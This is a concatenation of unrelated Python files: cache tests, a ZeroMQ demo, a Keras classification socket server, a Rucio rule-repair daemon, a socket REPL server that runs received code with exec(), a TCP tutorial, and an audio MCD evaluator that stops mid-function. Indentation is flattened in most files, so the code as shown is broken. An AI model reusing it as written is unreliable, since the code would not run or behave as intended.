self.cache.reset_mock()
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 2
assert self.cache.set.call_count == 0
self.cache.get.assert_any_call(self.mydict.cache_key)
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
def test_model_access_with_expired_local_cache(self):
spec = dict(key='hello', value='foo')
self.mydict['hello'] = MockModel(**spec)
self.mydict._last_updated = None
self.cache.reset_mock()
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 1
assert self.cache.set.call_count == 0
self.cache.get.assert_any_call(self.mydict.last_updated_cache_key)
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
class TestCachedDict:
def setup(self):
self.cache = Mock()
self.mydict = CachedDict(timeout=100)
        self.mydict.cache = self.cache
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=True))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_error_causes_reset(self, _update_cache_data):
self.cache.get.return_value = 1
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert _update_cache_data.called
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=True))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=False))
def test_expired_does_update_data(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert not _update_cache_data.called
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=False))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_reset_does_expire(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate(reset=True)
_update_cache_data.assert_called_once_with()
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=False))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_does_not_expire_by_default(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert not _update_cache_data.called
def test_is_expired_missing_last_updated(self):
self.mydict._last_updated = None
assert self.mydict.is_local_expired()
assert not self.cache.get.called
def test_is_expired_last_updated_beyond_timeout(self):
self.mydict._last_updated = time.time() - 101
assert self.mydict.is_local_expired()
    def test_is_expired_within_bounds(self):
        self.mydict._last_updated = time.time()
        assert not self.mydict.is_local_expired()
def test_is_not_expired_if_remote_cache_is_old(self):
# set it to an expired time
self.mydict._last_updated = time.time() - 101
self.cache.get.return_value = self.mydict._last_updated
result = self.mydict.has_global_changed()
last_updated = self.mydict.last_updated_cache_key
self.cache.get.assert_called_once_with(last_updated)
assert result == False
def test_is_expired_if_remote_cache_is_new(self):
# set it to an expired time
self.mydict._last_updated = time.time() - 101
self.cache.get.return_value = time.time()
result = self.mydict.has_global_changed()
last_updated = self.mydict.last_updated_cache_key
self.cache.get.assert_called_once_with(last_updated)
assert result == True
def test_is_expired_if_never_updated(self):
# _last_updated None
self.mydict._last_updated = None
self.cache.get.return_value = time.time()
result = self.mydict.has_global_changed()
assert result == True
@patch('switchboard.base.CachedDict._populate')
@patch('switchboard.base.CachedDict.get_default')
def test_returns_default_if_no_local_cache(self, get_default, populate):
get_default.return_value = 'bar'
value = self.mydict['foo']
assert get_default.called
assert value == 'bar'
class TestCacheConcurrency:
def setup(self):
self.mydict = CachedDict()
self.exc = None
@patch('switchboard.base.CachedDict.get_cache_data')
def test_cache_reset_race(self, get_cache_data):
'''
Test race conditions when populating a cache.
Setup a situation where the cache is cleared immediately after being
populated, to simulate the race condition of one thread resetting it
just after another has populated it.
'''
get_cache_data.return_value = dict(key='test')
t2 = threading.Thread(target=self.mydict.clear_cache)
def verify_dict_access():
self.mydict._populate()
# Fire up the second thread and wait for it to clear the cache.
t2.start()
t2.join()
# Verify that the first thread's cache is still populated.
# Note: we don't call self.mydict['key'] because we don't want to
# re-trigger cache population.
# Note: Any errors (assertion or otherwise) must be surfaced up to
# the parent thread in order for nose to see that something went
# wrong.
try:
assert self.mydict._cache, 'The cache was reset between threads'
assert self.mydict._cache['key'] == 'test'
except Exception as e:
self.exc = e
t1 = threading.Thread(target=verify_dict_access)
t1.start()
t1.join()
if self.exc:
raise self.exc
|
producerconsumer.py
|
'''
Created on 21 Aug 2015
@author: up45
'''
import os, logging
from threading import Thread
import binascii
import zmq
import numpy as np
#import zmq.PAIR, zmq.DEALER, zmq.ROUTER, zmq.ETERM
logging.basicConfig(level=logging.DEBUG)
PIPELINE = 2
def zpipe(ctx):
"""build inproc pipe for talking to threads
mimic pipe used in czmq zthread_fork.
Returns a pair of PAIRs connected via inproc
"""
a = ctx.socket(zmq.PAIR)
b = ctx.socket(zmq.PAIR)
a.linger = b.linger = 0
a.hwm = b.hwm = 1
iface = "inproc://%s" % binascii.hexlify(os.urandom(8))
a.bind(iface)
b.connect(iface)
return a,b
def producer(ctx):
'''The producer function generates numpy arrays
The arrays are sent out on a ROUTER socket as per request from the consumer.
The function returns (None) when all available arrays has been sent.
'''
log = logging.getLogger("producer")
router = ctx.socket(zmq.ROUTER)
socket_name = "tcp://*:6000"
log.info("Binding socket name: %s", socket_name)
router.bind(socket_name)
# We have two parts per message so HWM is PIPELINE * 2
router.hwm = PIPELINE * 2
log.info("Router HWM: %d", router.hwm)
num_arrays = 5
array_counter = 0
log.info("Number of arrays to send: %d", num_arrays)
while True:
# First frame in each message is the sender identity
# Second frame is "fetch" command
try:
log.debug("receiving...")
msg = router.recv_multipart()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
log.warning("Shutting down. zmq.ETERM")
return # shutting down, quit
else:
raise
log.debug( "got msg" )
identity, command = msg
log.debug("identity: %s cmd: %s", identity, command)
assert command == b"fetch"
data = b"blah"
log.debug("Sending data: %s", data)
router.send_multipart([identity, data], copy=False)
array_counter +=1
if array_counter > num_arrays:
break
log.info("Shutting down.")
def consumer(ctx, pipe):
'''The consumer requests and receives numpy arrays and write them to file
The arrays are appended to a HDF5 dataset. New arrays are being requested in
prefetch manner so that data is meant to be always available for writing.
'''
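    # Credit-based flow control (zguide style): keep up to PIPELINE "fetch"
    # requests outstanding so the next chunk is already in flight while the
    # current one is being handled.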
log = logging.getLogger("consumer")
dealer = ctx.socket(zmq.DEALER)
socket_name = "tcp://127.0.0.1:6000"
log.info("Connecting to socket name: %s", socket_name)
dealer.connect(socket_name)
dealer.hwm = PIPELINE
log.debug("Dealer HWM: %d", dealer.hwm)
credit = PIPELINE
while True:
while credit:
log.debug("Request: gimme more")
dealer.send_multipart([b"fetch"])
credit -= 1
log.debug("Receive...")
try:
raw_data = dealer.recv()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
log.warning("Shutting down. zmq.ETERM")
return
else:
raise
log.debug("Received: %d", len(raw_data))
log.debug(raw_data)
log.info("Consumer finished...")
pipe.send(b"OK")
def main():
# Start child threads
ctx = zmq.Context()
a,b = zpipe(ctx)
client = Thread(target=consumer, args=(ctx, b))
server = Thread(target=producer, args=(ctx,))
client.start()
server.start()
# loop until client tells us it's done
try:
        print(a.recv())
except KeyboardInterrupt:
pass
del a,b
ctx.term()
if __name__ == '__main__':
main()
|
server.py
|
#!/usr/bin/env python
import socket
from threading import Thread
import numpy as np
import os
import argparse
import config
import util
import joblib
import traceback
from keras.applications.imagenet_utils import preprocess_input
import time
util.set_img_format()
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True, help='Base model architecture',
choices=[config.MODEL_RESNET50,
config.MODEL_RESNET152,
config.MODEL_INCEPTION_V3,
config.MODEL_VGG16,
config.MODEL_MOBILENET])
args = parser.parse_args()
config.model = args.model
model_module = util.get_model_class_instance()
model = model_module.load()
print('Model loaded')
print('Warming up the model')
start = time.perf_counter()  # time.clock() is deprecated and removed in Python 3.8
if util.get_keras_backend_name() != 'tensorflow':
input_shape = (1, 3,) + model_module.img_size
else:
input_shape = (1, ) + model_module.img_size + (3, )
dummy_img = np.ones(input_shape)
dummy_img = preprocess_input(dummy_img)
model.predict(dummy_img)
end = time.perf_counter()
print('Warming up took {} s'.format(end - start))
print('Trying to load a Novelty Detector')
try:
af = util.get_activation_function(model, model_module.noveltyDetectionLayerName)
print('Activation function is loaded')
novelty_detection_clf = joblib.load(config.get_novelty_detection_model_path())
print('Novelty Detection classifier is loaded')
except Exception as e:
print('Error on loading Novelty Detection classifier', e)
FILE_DOES_NOT_EXIST = '-1'
UNKNOWN_ERROR = '-2'
def handle(clientsocket):
while 1:
buf = clientsocket.recv(config.buffer_size)
if buf == 'exit'.encode():
return # client terminated connection
response = ''
if os.path.isfile(buf):
try:
img = [model_module.load_img(buf)]
out = model.predict(np.array(img))
prediction = np.argmax(out)
top10 = out[0].argsort()[-10:][::-1]
class_indices = dict(zip(config.classes, range(len(config.classes))))
keys = list(class_indices.keys())
values = list(class_indices.values())
answer = keys[values.index(prediction)]
try:
acts = util.get_activations(af, img)
predicted_relativity = novelty_detection_clf.predict(acts)[0]
nd_class = novelty_detection_clf.__classes[predicted_relativity]
except Exception as e:
                    print(e)
nd_class = 'related'
top10_json = "["
for i, t in enumerate(top10):
top10_json += '{"probability":"%s", "class":"%s"}%s' % (
out[0][t], keys[values.index(t)], '' if i == 9 else ',')
top10_json += "]"
response = '{"probability":"%s","class":"%s","relativity":"%s","top10":%s}' % (
out[0][prediction], answer, nd_class, top10_json)
print(response)
except Exception as e:
print('Error', e)
traceback.print_stack()
response = UNKNOWN_ERROR
else:
response = FILE_DOES_NOT_EXIST
clientsocket.sendall(response.encode())
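# Protocol handled above: the client sends an image path as raw bytes and gets
# back a JSON string with the top prediction, the novelty-detection class and a
# top-10 list; the literal payload 'exit' ends the session, while a missing file
# or an internal error is signalled with the numeric codes defined above.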
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(config.server_address)
serversocket.listen(10000)
print('Ready for requests')
while 1:
# accept connections from outside
(clientsocket, address) = serversocket.accept()
ct = Thread(target=handle, args=(clientsocket,))
    ct.start()  # handle each client in its own thread so new connections can still be accepted
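# ---------------------------------------------------------------------------
# Illustrative client sketch (kept as a comment because the accept loop above
# never returns). The image path is a placeholder; config.server_address and
# config.buffer_size come from this project's config module.
#
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(config.server_address)
#   s.sendall('/path/to/image.jpg'.encode())
#   print(s.recv(config.buffer_size).decode())
#   s.sendall('exit'.encode())
#   s.close()
# ---------------------------------------------------------------------------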
|
repairer.py
|
# -*- coding: utf-8 -*-
# Copyright 2013-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import repair_rule, get_stuck_rules
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_repairer(once=False):
"""
Main loop to check for STUCK replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
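    # Rules that hit row-lock contention (ORA-00054) below are parked here with
    # a retry deadline; they are skipped via blacklisted_rules until the
    # deadline passes and the entry is dropped at the top of the loop.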
# Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
executable = 'judge-repairer'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
# Select a bunch of rules for this worker to repair
rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
delta=-1 if once else 1800,
limit=100,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_repairer[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule_id in rules:
rule_id = rule_id[0]
logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
repair_rule(rule_id=rule_id)
logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Repairer threads.
"""
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'judge-repairer'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_repairer(once)
else:
logging.info('Repairer starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
replserver.py
|
"""
socat - UNIX-CONNECT:repl.sock
import sys, threading, pdb, functools
def _attach(repl):
frame = sys._current_frames()[threading.enumerate()[0].ident]
debugger = pdb.Pdb(
stdin=repl.conn.makefile('r'),
stdout=repl.conn.makefile('w'),
)
debugger.reset()
while frame:
frame.f_trace = debugger.trace_dispatch
debugger.botframe = frame
frame = frame.f_back
debugger.set_step()
frame.f_trace = debugger.trace_dispatch
"""
import ast
import codeop
import contextlib
import errno
import functools
import logging
import os
import socket as socket_
import sys
import threading
import traceback
import types
import typing as ta
import weakref
from . import check
log = logging.getLogger(__name__)
class DisconnectException(Exception):
pass
class InteractiveSocketConsole:
"""code.InteractiveConsole but just different enough to not be worth subclassing."""
ENCODING = 'utf-8'
def __init__(
self,
conn: socket_.socket,
locals: ta.MutableMapping = None,
filename: str = '<console>'
) -> None:
super().__init__()
if locals is None:
locals = {
'__name__': '__console__',
'__doc__': None,
'__console__': self,
}
self._conn = conn
self._locals = locals
self._filename = filename
self._compiler = codeop.CommandCompiler()
self._buffer: ta.List[str] = []
self._count = 0
self._write_count = -1
def reset_buffer(self) -> None:
self._buffer = []
@property
def conn(self) -> socket_.socket:
return self._conn
CPRT = 'Type "help", "copyright", "credits" or "license" for more information.'
def interact(self, banner: str = None, exitmsg: str = None) -> None:
log.info(f'Console {id(self)} on thread {threading.current_thread().ident} interacting')
try:
ps1 = getattr(sys, 'ps1', '>>> ')
ps2 = getattr(sys, 'ps2', '... ')
if banner is None:
self.write(
'Python %s on %s\n%s\n(%s)\n' %
(sys.version, sys.platform, self.CPRT, self.__class__.__name__))
elif banner:
self.write('%s\n' % (str(banner),))
more = False
while True:
try:
try:
line = self.raw_input(ps2 if more else ps1)
except EOFError:
self.write('\n')
break
else:
more = self.push_line(line)
except KeyboardInterrupt:
self.write('\nKeyboardInterrupt\n')
self.reset_buffer()
more = False
if exitmsg is None:
self.write('now exiting %s...\n' % self.__class__.__name__)
elif exitmsg != '':
self.write('%s\n' % exitmsg)
except DisconnectException:
pass
except OSError as oe:
if oe.errno == errno.EBADF:
pass
finally:
log.info(f'Console {id(self)} on thread {threading.current_thread().ident} finished')
def push_line(self, line: str) -> bool:
self._buffer.append(line)
source = '\n'.join(self._buffer)
more = self.run_source(source, self._filename)
if not more:
self.reset_buffer()
return more
def raw_input(self, prompt: str = '') -> str:
self.write(prompt)
buf = b''
while True:
b = self._conn.recv(1)
if not b:
raise DisconnectException
if b == b'\n':
break
buf += b
return buf.decode(self.ENCODING)
def write(self, data: str) -> None:
self._conn.send(data.encode(self.ENCODING))
def compile(
self,
source: ta.Union[str, ast.AST],
filename: str = '<input>',
symbol: str = 'single'
) -> ta.Optional[types.CodeType]:
if isinstance(source, ast.AST):
return self._compiler.compiler(source, filename, symbol)
else:
return self._compiler(source, filename, symbol)
def run_source(
self,
source: ta.Union[str, ast.AST],
filename: str = '<input>',
symbol: str = 'single',
) -> bool:
try:
code = self.compile(source, filename, symbol)
except (OverflowError, SyntaxError, ValueError):
# Case 1 (incorrect)
self.show_syntax_error(filename)
return False
if code is None:
# Case 2 (incomplete)
return True
# Case 3 (complete)
try:
node = ast.parse(source)
except (OverflowError, SyntaxError, ValueError):
return True
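        # If the last statement is a bare expression, rewrite the module so its
        # value is bound to a numbered local (_0, _1, ...); run_code() then
        # echoes that value back, mimicking the interactive "_" behaviour.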
if isinstance(node, ast.Module) and node.body and isinstance(node.body[-1], ast.Expr):
expr = node.body[-1]
source = ast.Interactive(
[
*node.body[:-1],
ast.Assign(
[ast.Name(
f'_{self._count}',
ast.Store(),
lineno=expr.lineno,
col_offset=expr.col_offset,
)],
expr.value,
lineno=expr.lineno,
col_offset=expr.col_offset,
)
],
)
ast.fix_missing_locations(source)
self._write_count = self._count
code = self.compile(source, filename, symbol)
self.run_code(code)
return False
def run_code(self, code: types.CodeType) -> None:
try:
exec(code, self._locals)
except SystemExit:
raise
except Exception:
self.show_traceback()
else:
if self._count == self._write_count:
self.write(repr(self._locals[f'_{self._count}']))
self.write('\n')
self._count += 1
def show_traceback(self) -> None:
sys.last_type, sys.last_value, last_tb = ei = sys.exc_info()
sys.last_traceback = last_tb
try:
lines = traceback.format_exception(ei[0], ei[1], last_tb.tb_next)
self.write(''.join(lines))
finally:
last_tb = ei = None
def show_syntax_error(self, filename: str = None) -> None:
type, value, tb = sys.exc_info()
sys.last_type = type
sys.last_value = value
sys.last_traceback = tb
if filename and type is SyntaxError:
# Work hard to stuff the correct filename in the exception
try:
msg, (dummy_filename, lineno, offset, line) = value.args
except ValueError:
# Not the format we expect; leave it alone
pass
else:
# Stuff in the right filename
value = SyntaxError(msg, (filename, lineno, offset, line))
sys.last_value = value
lines = traceback.format_exception_only(type, value)
self.write(''.join(lines))
class ReplServer:
CONNECTION_THREAD_NAME = 'ReplServerConnection'
def __init__(
self,
path: str,
*,
file_mode: int = None,
poll_interval: float = 0.5,
exit_timeout: float = 10.0,
) -> None:
super().__init__()
self._path = path
self._file_mode = file_mode
self._poll_interval = poll_interval
self._exit_timeout = exit_timeout
self._socket: socket_.socket = None
self._is_running = False
self._consoles_by_threads: ta.MutableMapping[threading.Thread, InteractiveSocketConsole] = weakref.WeakKeyDictionary() # noqa
self._is_shut_down = threading.Event()
self._should_shutdown = False
def __enter__(self):
check.state(not self._is_running)
check.state(not self._is_shut_down.is_set())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if not self._is_shut_down.is_set():
self.shutdown(True, self._exit_timeout)
def run(self) -> None:
check.state(not self._is_running)
check.state(not self._is_shut_down.is_set())
if os.path.exists(self._path):
os.unlink(self._path)
self._socket = socket_.socket(socket_.AF_UNIX, socket_.SOCK_STREAM)
self._socket.settimeout(self._poll_interval)
self._socket.bind(self._path)
with contextlib.closing(self._socket):
self._socket.listen(1)
log.info(f'Repl server listening on file {self._path}')
self._is_running = True
try:
while not self._should_shutdown:
try:
conn, _ = self._socket.accept()
except socket_.timeout:
continue
log.info(f'Got repl server connection on file {self._path}')
def run(conn):
with contextlib.closing(conn):
variables = globals().copy()
console = InteractiveSocketConsole(conn, variables)
variables['__console__'] = console
log.info(
f'Starting console {id(console)} repl server connection '
f'on file {self._path} '
f'on thread {threading.current_thread().ident}'
)
self._consoles_by_threads[threading.current_thread()] = console
console.interact()
thread = threading.Thread(
target=functools.partial(run, conn),
daemon=True,
name=self.CONNECTION_THREAD_NAME)
thread.start()
for thread, console in self._consoles_by_threads.items():
try:
console.conn.close()
except Exception:
log.exception('Error shutting down')
for thread in self._consoles_by_threads.keys():
try:
thread.join(self._exit_timeout)
except Exception:
log.exception('Error shutting down')
os.unlink(self._path)
finally:
self._is_shut_down.set()
self._is_running = False
def shutdown(self, block: bool = False, timeout: float = None) -> None:
self._should_shutdown = True
if block:
self._is_shut_down.wait(timeout=timeout)
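# Hypothetical usage sketch (not part of the original module): a minimal client
# for the Unix-socket REPL served by ReplServer above. It assumes the server is
# already listening on 'repl.sock' (as in _main below) and that the console
# encoding is UTF-8.
def _example_client(path: str = 'repl.sock') -> None:
    import socket  # local import keeps the sketch self-contained
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(path)
        print(sock.recv(4096).decode('utf-8'))  # banner (and, typically, the first '>>> ' prompt)
        sock.sendall(b'1 + 1\n')                # the console reads one line per send
        print(sock.recv(4096).decode('utf-8'))  # result of the expression, then the next prompt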
def _main():
with ReplServer('repl.sock') as repl_server:
repl_server.run()
if __name__ == '__main__':
_main()
|
C16_tcpserver.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'A TCP network programming exercise'
__author__ = 'Jacklee'
# The socket module
# Network programming is built on the Internet protocol family
# The most commonly used protocol in that family is HTTP
# HTTP is carried over the TCP transport protocol
# TCP is a connection-oriented communication protocol
# with one server end and multiple client ends
# Once a client and the server are connected, data can flow in both directions
# TCP implementation
import socket
import threading, time
# The socket object
# socket(family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None)
# : family  protocol family, defaults to IPv4
# : type    socket type, defaults to a stream socket
# Create a socket
tcpserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('Created a socket...')
# Bind an IP address and port number
# 1. The machine may have several network interfaces, so the address must be specified
# 2. A port number must be specified
# bind(address)
# :address is an (ip, port) pair
tcpserver.bind(('127.0.0.1', 6789))
print('Socket bound to local port 6789....')
# Wait for client connections
# listen([backlog])
# :backlog maximum number of queued connections
tcpserver.listen(5)
print('Socket allows at most 5 connections...')
print('Waiting for clients to connect...')
def tcplink(sock, addr):
    print('Accepted a new client connection. %s:%s...' % addr)
    sock.send('Welcome!'.encode('utf-8'))
    while True:
        # Read data from the socket
        # recv() is a blocking call:
        # if no data has arrived it keeps waiting and does not return
        data = sock.recv(1024)
        time.sleep(1)
        if not data or data.decode('utf-8') == 'exit':
            break
        sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
    sock.close()
    print('Connection from %s:%s closed.' % addr)
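# Hypothetical companion client (not part of the original script): connect to the
# server above, print the greeting, send two names and finally 'exit' so the
# server-side tcplink thread terminates. Host and port mirror the bind() call.
def demo_client():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(('127.0.0.1', 6789))
    print(client.recv(1024).decode('utf-8'))      # 'Welcome!'
    for name in ('Michael', 'Tracy'):
        client.send(name.encode('utf-8'))
        print(client.recv(1024).decode('utf-8'))  # 'Hello, <name>!'
    client.send(b'exit')
    client.close()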
# Loop waiting for client connections
# When a connection arrives, create a new thread to handle the reads/writes
# (conn, addr) = accept()
# :conn  a socket object that can be used for reading and writing
# :addr  the address pair of the connection
# accept() is blocking: it does not return until a new connection arrives
while True:
sock, addr = tcpserver.accept()
trd = threading.Thread(target=tcplink, args=(sock, addr))
trd.start()
|
evaluate_mcd.py
|
#!/usr/bin/env python3
# Copyright 2020 Wen-Chin Huang and Tomoki Hayashi
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Evaluate MCD between generated and groundtruth audios with SPTK-based mcep."""
import argparse
import fnmatch
import logging
import multiprocessing as mp
import os
from typing import Dict, List, Tuple
import librosa
import numpy as np
import pysptk
import soundfile as sf
from fastdtw import fastdtw
from scipy import spatial
def find_files(
root_dir: str, query: List[str] = ["*.flac", "*.wav"], include_root_dir: bool = True
) -> List[str]:
"""Find files recursively.
Args:
        root_dir (str): Root directory to search.
query (List[str]): Query to find.
include_root_dir (bool): If False, root_dir name is not included.
Returns:
List[str]: List of found filenames.
"""
files = []
for root, dirnames, filenames in os.walk(root_dir, followlinks=True):
for q in query:
for filename in fnmatch.filter(filenames, q):
files.append(os.path.join(root, filename))
if not include_root_dir:
files = [file_.replace(root_dir + "/", "") for file_ in files]
return files
def sptk_extract(
x: np.ndarray,
fs: int,
n_fft: int = 512,
n_shift: int = 256,
mcep_dim: int = 25,
mcep_alpha: float = 0.41,
is_padding: bool = False,
) -> np.ndarray:
"""Extract SPTK-based mel-cepstrum.
Args:
x (ndarray): 1D waveform array.
fs (int): Sampling rate
n_fft (int): FFT length in point (default=512).
n_shift (int): Shift length in point (default=256).
mcep_dim (int): Dimension of mel-cepstrum (default=25).
mcep_alpha (float): All pass filter coefficient (default=0.41).
is_padding (bool): Whether to pad the end of signal (default=False).
Returns:
        ndarray: Mel-cepstrum with shape (n_frame, mcep_dim + 1).
"""
# perform padding
if is_padding:
n_pad = n_fft - (len(x) - n_fft) % n_shift
x = np.pad(x, (0, n_pad), "reflect")
# get number of frames
n_frame = (len(x) - n_fft) // n_shift + 1
# get window function
win = pysptk.sptk.hamming(n_fft)
# check mcep and alpha
if mcep_dim is None or mcep_alpha is None:
mcep_dim, mcep_alpha = _get_best_mcep_params(fs)
# calculate spectrogram
mcep = [
pysptk.mcep(
x[n_shift * i : n_shift * i + n_fft] * win,
mcep_dim,
mcep_alpha,
eps=1e-6,
etype=1,
)
for i in range(n_frame)
]
return np.stack(mcep)
def _get_basename(path: str) -> str:
return os.path.splitext(os.path.split(path)[-1])[0]
def _get_best_mcep_params(fs: int) -> Tuple[int, float]:
if fs == 16000:
return 23, 0.42
elif fs == 22050:
return 34, 0.45
elif fs == 24000:
return 34, 0.46
elif fs == 44100:
return 39, 0.53
elif fs == 48000:
return 39, 0.55
else:
raise ValueError(f"Not found the setting for {fs}.")
def calculate(
file_list: List[str],
gt_file_list: List[str],
args: argparse.Namespace,
mcd_dict: Dict,
):
"""Calculate MCD."""
for i, gen_path in enumerate(file_list):
corresponding_list = list(
filter(lambda gt_path: _get_basename(gt_path) in gen_path, gt_file_list)
)
assert len(corresponding_list) == 1
gt_path = corresponding_list[0]
gt_basename = _get_basename(gt_path)
# load wav file as int16
gen_x, gen_fs = sf.read(gen_path, dtype="int16")
gt_x, gt_fs = sf.read(gt_path, dtype="int16")
fs = gen_fs
if gen_fs != gt_fs:
gt_x = librosa.resample(gt_x.astype(np.float), gt_fs, gen_fs)
# extract ground truth and converted features
gen_mcep = sptk_extract(
x=gen_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
gt_mcep = sptk_extract(
x=gt_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
# DTW
_, path = fastdtw(gen_mcep, gt_mcep, dist=spatial.distance.euclidean)
twf = np.array(path).T
gen_mcep_dtw = gen_mcep[twf[0]]
gt_mcep_dtw = gt_mcep[twf[1]]
# MCD
